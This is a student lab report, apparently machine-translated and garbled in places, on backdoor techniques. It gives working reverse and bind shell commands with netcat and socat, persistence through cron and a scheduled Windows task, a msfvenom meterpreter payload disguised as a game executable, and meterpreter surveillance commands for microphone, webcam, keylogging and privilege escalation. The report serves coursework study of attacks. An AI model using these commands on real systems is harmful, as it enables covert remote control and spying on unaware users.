[COOL]
2019-2020-2 20,175,321 Wuding Cheng "network technology against" back door Principles and Practice Exp2
A practice target
- Task One: Use netcat get the host operating Shell, cron start
- Task Two: Use socat get the host operating Shell, plans to start the task
- Task 3: Use MSF meterpreter (or other software) to generate an executable file, or use ncat socat to the host and run to get the host Shell
- Task 4: Use MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right
Second, the basics
- Backdoor: not through the normal certification process and the access channel system
- May exist:
- translater
- operating system
- firmware
- application
- Backdoor Workflow: Workflow back door: the program is running → → → implanted to avoid killing.
- Backdoor:
- Netcat: is a bottom tool, the basic TCP UDP data transmitting and receiving. Use is often combined with other tools, play the role of the back door.
- socat: socat nc is an enhanced version of the basic function is to create two socat bidirectional byte stream data is transmitted therebetween, the parameter is the address of which represents a new direction. The so-called flow represents the flow of data, and the data can have many different types, the command requires a number of options for correspondingly various types defined and described data flow.
- Meterpreter: has powerful features, especially its socks proxy. Meterpreter is a killer Metasploit framework, usually as an attack after overflow vulnerability load use, the attack load after triggering the vulnerability can return a our control channel, for example using a vulnerability remote procedure with oh by RPC services, when a vulnerability is triggered, we choose Meterpreter as an attack load, it is possible to obtain a Meterpreter Shell on the target system is connected. Meterpreter Metasploit Framework is an extension module, you can call some of the features of Metasploit, the target system more in-depth penetration, these features include anti-tracking, memory-only mode, password hashes acquisition, elevation of privilege, a springboard for attacks.
Third, the experimental content
1. Use netcat get the host operating Shell, cron start
1.1 Use Windows to get Linux Shell
First used in Windows ipconfig
to see its IP address
After turning off the firewall, use ncat.exe program to open listeningncat.exe -l -p 5321
Use the -e option to execute a shell program in kali rebound connect Windows:nc 192.168.1.18 5321 -e /bin/sh
In the windows will be able to successfully kali's shell:
1.2Linux get Windows Shell
In kali in ifconfig
view of kali IP:
Use nc -l -p 5321
open listening kali
Use in Windows ncat.exe -e cmd.exe 192.168.1.20 5321
rebound connection kali
kali successful Windows command prompt:
1.3 start cron
Cron is timed tasks under Linux, every minute running time, preset instruction is executed according to the configuration file.
Listening port under Windows 5321, Linux system, enter the command crontab -e and select 3 to enter edit mode,
Add 21 * * * * / bin / netcat 192.168.1.18 5321 -e / bin / sh in the last row, represents 21 per hour from the instruction executed later in time-sharing.
inux connection in Windows 21 time-sharing, available shell after listening windows connection:
1.4 nc data transmission
Use ncat.exe -l 5321 5321 listening port under Windows, kali use nc 192.168.1.18 5321 rally port to connect to Windows 5321, the connection is established successfully after the two sides can transfer data to
2. Use socat get the host operating Shell, plans to start the task
Open the Computer Management after downloading socat - Task Scheduler - create a task, complete the task name and create a new trigger.
Choose your socat.exe files in the operating program or script path, add the parameter field fill tcp-listen:5321 exec:cmd.exe,pty,stderr
this role cmd.exe command is to bind to port 5317, while the cmd.exe redirect the stderr to stdout
After create a trigger, set time, set the default to other
You can see the task is already running
After reaching the trigger time, we will find the task to run automatically
In kali input instructions socat - tcp:192.168.0.102:5321
can connect to port Windows 5321 host, and then you can get the Windows shell:
3. MSF meterpreter an executable file using ncat socat or transferred to the host and the host operating acquired Shell
Use kali attack win10, first executing instructions on Kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=5321 -f exe > Counter-Strike20175321.exe
, IP address here is kali of IP.
Execution under Windows ncat.exe -lv 5321 > Counter-Strike20175321.exe
command, view the current connection status
Kali use in the nc 192.168.1.18 5321 < Counter-Strike20175321.exe
transport backdoor, cmd success win10 transmission of information will appear in the transmission
Kali used on msfconsole
instruction enters msf console, type:
use exploit/multi/handler //使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp //使用和生成后门程序时相同的payload
set LHOST 192.168.1.20 //kali的IP
set LPORT 5321 //要使用相同的端口
Use exploit
start listening, backdoor programs running in Windows
running under Windows backdoor in cmd, then get a shell Windows hosts on Kali.
4. Use MSF meterpreter destination host generates audio content acquisition, camera, records keystrokes, and try to privilege escalation
4.1 record_mic command input can be intercepted for a long time audio recording is completed automatically save the output path:
4.2 Input webcam_snap instructions may use the camera for photographing, the photographing is completed automatically save the output path, and automatically open the image
4.3 keyscan_start inputs and keyscan_dump target instruction fetch record keystrokes:
4.4. The instructions may be input screenshot screenshot
4.5 getsystem instruction input operation privilege escalation:
Fourth, the problems encountered in the experiment
1. Use the nc file transfer was not successful
unknown reason
Solution: No
2.corn to time does not start
Cause: The condition checked by default "Start this task only if the computer on AC power" and "If the computer to switch to battery power, stop."
Solution: plug or uncheck.
3. This application can not run on your computer
The reason: backdoor file transfer failed.
Solution: re-transmission can be.
Fifth, experiment and experience summary
1. Basic questions answered
- (1) include a back door you can think of possible ways to enter your system?
- From software acquired non-official website
- (2) How do you know exemplified by the back door to start up (win and linux) way?
- Timer start (for example Corn), start / restart from the start, run a program start.
- Which gives you a profound image function (3) Meterpreter there?
- Access the camera in a case where the user is unaware of the attacked machine steal image and audio.
- (4) How to find yourself the system has not been installed back door?
- Turn on the firewall and antivirus software, do not give the program a chance.
2. Experimental Experience
I thought this experiment would not spend so much time, but because it involves different systems monitor each other (machine), transferring data and files, often a variety of unexpected situation occurs. Not only do we need patience to analyze and solve problems one after another, but also have the courage to redo understand the nature of courage and a pair of "eyes," Oh really able to train a person.